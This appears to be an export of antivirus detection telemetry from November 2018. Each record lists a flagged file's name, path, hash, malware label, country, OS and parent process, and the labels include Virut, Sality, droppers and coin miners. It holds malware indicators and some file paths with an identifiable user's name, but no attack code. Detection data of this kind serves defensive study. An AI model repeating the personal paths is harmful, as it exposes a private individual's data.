  Row(detection=Row(filename='proshow.producer.7.0-patch.exe', filepath='C:\\Program Files (x86)\\Photodex\\ProShow Producer\\proshow.producer.7.0-patch.exe', filesize=3584000, name='SPR/Hacktool.3584000.#M1.#R1'), hash='ed5e28440b04dedb1a10c749962f5ef0d70856773e3f70ed2b349097c5931190', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:25:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ekrdfnkt.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\eKrdFNKT.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\bxkjsm34jii\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Free\\18054424.exe', parentsize=671232, timestamp='2018-11-01T11:52:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00006308', filepath='C:\\Windows\\Temp\\985f6e50-1edd-4d78-b6ee-c8c3cfd05f1d\\tmp000003d6\\tmp00006308', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='dd7cf2bcb89a2bd45d92ae8d8332f8fde6b7124a07408965bb7d6286fe3d9209', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.0.649.11190\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-01T11:02:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\pxqyzl0r0v5\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:41:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132301-de298df4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-132248-DBCED8CF\\AVSCAN-20181101-132301-DE298DF4', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:23:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213545-55edf1d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213545-55EDF1D6', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:36:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='attestati riq oss 582581.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ATTESTATI RIQ OSS 582581\\ATTESTATI RIQ OSS 582581.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:20:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004d88', filepath='C:\\Windows\\Temp\\tmp00001cb6\\tmp00004d88', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='873b1c6fd4b093480ca160808ed97c16b73037fbd969c21105c509be89503510', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T16:29:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183124-42390bdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183124-42390BDD', filesize=64000, name='VBA/Dldr.Agent.tlcym.#M1.#R1'), hash='c379ce56c97f30e587aef5054ce5a4fd1e1d0d095b6ff80d6b423553ce223850', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c18e77344387ae8270290a11ebf0a92345b3dbbf', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\c18e77344387ae8270290a11ebf0a92345b3dbbf', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='43faa100d01314ab96c211ea4834705d52753c7d001b744a0eb87d7d2bff4016', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:50:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msouc.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSOUC.EXE', filesize=564000, name='W32/Sality.AT.#M1.#R1'), hash='77a1c6dc6bde606f8322220663496a4a3c060300e48210a7396a038351b301c3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LP+mRn45hUK0B\\\\\\/Ug.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\winsxs\\amd64_microsoft-windows-a..xperience-inventory_31bf3856ad364e35_6.1.7601.24187_none_e8b035c2fecaaa49\\CompatTelRunner.exe', parentsize=140992, timestamp='2018-11-04T15:12:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f182', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f182', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:21:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-002232-acf10c53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-002232-ACF10C53', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:52:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130639-0265dc07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130639-0265DC07', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:06:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-075329-e83d43b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7798ad27\\AVSCAN-20181103-125221-12FBDF5F\\AVSCAN-20181105-075329-E83D43B1', filesize=5776000, name='WORM/Lodbak.Gen4.#M1.#R1'), hash='9db892f5cbd5bc8cc3370da0f9aa263c94a00429a3e54f061d23fa5f67c88a0a', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T23:52:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-020814-ba80787f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181031-205810-8E73B4A7\\AVSCAN-20181104-020814-BA80787F', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:24:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182254-07c02215', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_45312470\\AVSCAN-20181104-180213-22BA0E1F\\AVSCAN-20181104-182254-07C02215', filesize=256000, name='Adware/Elex.05be7a.#M1.#R1'), hash='05be7aa84e9a0b75d8151ed807dc384937531cfd152316e9a7c79c299d2a5790', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:22:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T16:34:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3579093\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:09:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:47:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:31:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024352', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024352', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:46:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T00:34:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001729-8d46af11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001729-8D46AF11', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:47:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maxiget.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='842272f756ee756fac0ae3d2ff9fcad19b6891feaa61e8ddd0f09f2156c403c4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T21:05:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:40:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-064922-8d637e8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-064922-8D637E8B', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:49:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:57:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T23:58:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162032-e4349714', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-162032-E4349714', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:20:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:32:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b478f1a0c4eaa3f21efdeef6aceee8a7e688d44862082fac5743a19d2bb4c0ea', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B478F1A0C4EAA3F21EFDEEF6ACEEE8A7E688D44862082FAC5743A19D2BB4C0EA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b478f1a0c4eaa3f21efdeef6aceee8a7e688d44862082fac5743a19d2bb4c0ea', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:27:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:02:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:14:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:01:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_168b8da8.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_168b8da8.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0006209c', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0006209c', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-88014f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215927-88014F79', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='9817ab650882f71b16a47cdef489c0c1edde5abeec990a9c55e601cc33cab0d3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:47:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:53:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0019634.exe', filepath='K:\\System Volume Information\\_restore{773AF8A0-4C32-4C59-9834-3FB7D6D73C8A}\\RP2\\A0019634.EXE', filesize=64000, name='W32/Sality.AT.#M1.#R1'), hash='b3050827916e7a7fe272fe367cb7c1af223c79c00255a23b8dbeb48d398de4b3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:35:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:21:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3889892\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\installer_ares.exe', parentsize=2383184, timestamp='2018-11-04T19:22:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:53:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='handle-x.exe', filepath='\\?\\H:\\Private\\برمجه\\VB6\\VB Full RAT Codes\\HandleX_RAT\\Handle-X\\Client\\Handle-X.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='66df70a813801e2242e5f9caaa1f953c19acaae43eb97cb23fe8868289610fa6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:42:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='whatsapp images.exe', filepath='d:\\هبه\\new folder (2)\\whatsapp\\media\\whatsapp images\\WhatsApp Images.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='b9409d8e1b382236ea21942e235f81e32c22d45c0c136872420d9cba90f239d8', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:56:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/recovered', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-04T08:02:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204824-d9c435e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-204824-D9C435E1', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:48:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d446', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d446', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132156-cb5598a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4ba32583\\AVSCAN-20181104-123253-424E92FB\\AVSCAN-20181104-132156-CB5598A6', filesize=128000, name='PUA/Outbrowse.Gen.#M1.#R1'), hash='555ac4eaff7b8bcf964d627b5e4a497896a066eda5217c2ef82796731722f600', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxabf3d.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaBF3C.tmp\\dxaBF3D.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:19Z'), dt=datetime.date(2018, 11, 4)),
